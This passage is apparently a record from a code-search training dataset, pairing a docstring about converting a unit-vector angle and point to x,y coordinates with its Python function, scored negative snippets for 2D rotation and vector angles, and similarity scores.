ConvexHull(wingSectionPoints)\n # # WARNING since we have built a 2D surface, the function is set up\n # # in a way that this is correct!\n # area = hull.volume\n\n logger.debug(\"Computed section area: \"+str(area))\n\n return area" ]
[ "0.71409", "0.64706504", "0.6422543", "0.6240047", "0.62209463", "0.619702", "0.60763705", "0.60492533", "0.6021375", "0.60020083", "0.59830874", "0.5958246", "0.595116", "0.59336185", "0.5892794", "0.58926195", "0.5882427", "0.58573145", "0.58370155", "0.58370155", "0.5837001", "0.57985526", "0.57971835", "0.5789974", "0.57884276", "0.577767", "0.57665795", "0.5747592", "0.57388616", "0.5737256" ]
0.79123634
0
Given an angle from the horizontal axis and a point from the origin, returns the converted unit vector coordinates in x, y coordinates. The angle of the unit vector should be in radians. Returns
def _to_xy_coordinates(unit_vector_angle, point):
    angle_orthogonal = unit_vector_angle + pi / 2
    return point[0] * cos(unit_vector_angle) + point[1] * cos(angle_orthogonal), \
           point[0] * sin(unit_vector_angle) + point[1] * sin(angle_orthogonal)
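# Example (hypothetical): _to_xy_coordinates(0, (2, 3)) returns approximately
# (2.0, 3.0), since an angle of 0 keeps the rotated frame aligned with the x/y axes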
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def vector_to_axis(line, point):\n line = line.normalized()\n np = point.norm()\n angle = line.angle(point)\n return point - line ** (np * numpy.cos(angle))", "def vector_from_angle(angle: float, magnitude: float = 1) -> typing.Tuple[float, float]:\n x = math.cos(angle) * magnitude\n y = math.sin(angle) * magnitude\n return x, y", "def getVectorWithAngle(self, angle):\n vector_perpendicular = self.getOnePerpendicularVector()\n vector_with_angle = self.rotateAroundAxis(vector_perpendicular,\n angle)\n\n return vector_with_angle", "def angleToVector(teta):\r\n x=1 #we fix x and we will determine z in consquence\r\n #we want z/x=tan(teta) so:\r\n z=np.tan(teta)*x\r\n return((x,z))", "def rotate_a(origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def two_d_horizontal_angle(lower_point, upper_point):\n\n \"\"\"finds angle from the horizontal. It is good for scenarios such as jacking coeff and anti squat\"\"\"\n vect = np.subtract(upper_point, lower_point)\n np.ndarray.tolist(vect)\n # project to front view by deleting x term\n # vertical vect\n horiz_vect = [1, 0]\n\n # using this relation http://www.wikihow.com/Find-the-Angle-Between-Two-Vectors\n angle = np.arccos(np.divide(np.dot(vect, horiz_vect), (magnitude(lower_point, upper_point)))) * 180 / math.pi\n return angle", "def perpendicular_axis(vec):\n axis = vec.rotate(-math.pi / 2) # rotate vector -90 degrees\n axis = axis.norm() # turn axis vector into unit vector\n return axis", "def _rotate_point(origin, point, angle):\n\n ox, oy = origin\n px, py = point\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def rotate(origin, point, angle): # Library export\r\n ox, oy = origin\r\n px, py = point\r\n\r\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\r\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\r\n return (qx, qy)", "def axisangle2matrix(angle, direction, point=None):\r\n sina = math.sin(angle)\r\n cosa = math.cos(angle)\r\n direction = unit_vector(direction[:3])\r\n # rotation matrix around unit vector\r\n R = numpy.diag([cosa, cosa, cosa])\r\n R += numpy.outer(direction, direction) * (1.0 - cosa)\r\n direction *= sina\r\n R += numpy.array([[ 0.0, -direction[2], direction[1]],\r\n [ direction[2], 0.0, -direction[0]],\r\n [-direction[1], direction[0], 0.0]])\r\n M = numpy.identity(4)\r\n M[:3, :3] = R\r\n if point is not None:\r\n # rotation not around origin\r\n point = numpy.array(point[:3], dtype=numpy.float64, copy=False)\r\n M[:3, 3] = point - numpy.dot(R, point)\r\n return M", "def rotate(origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + np.math.cos(angle) * (px - ox) - np.math.sin(angle) * (py - oy)\n qy = oy + np.math.sin(angle) * (px - ox) + np.math.cos(angle) * (py - oy)\n return qx, qy", "def rotate(origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + np.cos(angle) * (px - ox) - np.sin(angle) * (py - oy)\n qy = oy + np.sin(angle) * (px - ox) + np.cos(angle) * (py - oy)\n return qx, qy", "def atan2_vec(vector):\n return -np.arctan2(vector[1], vector[0])", "def dir_vect(theta):\n return np.array([np.cos(theta),np.sin(theta)])", "def transform2D(x: float, y: float, angle: float) -> np.array:\n c = np.cos(angle)\n s = np.sin(angle)\n return np.array([[c, -s, x], [s, c, 
y], [0.0, 0.0, 1.0]])", "def rotate(origin, point, angle):\n ox, oy = origin[0],origin[1]\n px, py = point[0],point[1]\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return [qx, qy]", "def rotate(origin, point, angle):\n ox, oy = origin\n px, py = point\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def rotate(origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def rotate(origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def rotate(origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def invgeochart(w):\n # u = torch.asin(w[...,2])\n u = torch.acos(w[...,2])\n # v = torch.acos(w[...,0]/torch.cos(u))\n v = torch.atan(w[...,1]/w[...,0])\n return torch.stack((u,v+np.pi))", "def rotate(self, origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + np.cos(angle) * (px - ox) - np.sin(angle) * (py - oy)\n qy = oy + np.sin(angle) * (px - ox) + np.cos(angle) * (py - oy)\n return qx, qy", "def rotate(origin, point, angle):\r\n ox, oy = origin\r\n px, py = point\r\n\r\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\r\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\r\n return (qx,qy)", "def point(pt, angle, dist):\n x, y = pt\n return dist * cos(angle) + x, dist * sin(angle) + y,", "def angle_from_point( x, img_width=640, fov_angle=44 ):\r\n return( -( ( img_width / 2 ) - x ) * fov_angle )", "def rotate(point, angle, origin=(0.0, 0.0)):\n ox, oy = origin\n px, py = point\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def getUnitVector(self):\n return Vector.createFromPolar(1, self.angle)", "def vector_angle(v):\n assert len(v) == 2\n x, y = v\n return np.arctan2(y, x)", "def vToA( x, y, a ):\n if y == 0:\n # dangerous special case (avoids div by 0 in dx/dy)\n if x > 0:\n return math.pi * 0.5\n elif x < 0:\n return -math.pi * 0.5\n else:\n # don't change angle... previous is probably best\n return a\n else:\n # safe to use atan technique\n a = math.atan( x / y )\n if y < 0:\n # inverted\n a += math.pi\n return a", "def rotate(origin, point, angle):\n oy, ox = origin\n py, px = point\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qy, qx" ]
[ "0.6875712", "0.6629386", "0.6577215", "0.64005256", "0.6300734", "0.62850034", "0.61816216", "0.61778945", "0.6121601", "0.6113652", "0.61109966", "0.6102749", "0.6102427", "0.6094682", "0.6085306", "0.60775954", "0.60771406", "0.6071323", "0.6071323", "0.6071323", "0.60596865", "0.60535425", "0.6031343", "0.602143", "0.6018452", "0.60092634", "0.60062635", "0.60002244", "0.59965986", "0.59943545" ]
0.78936476
0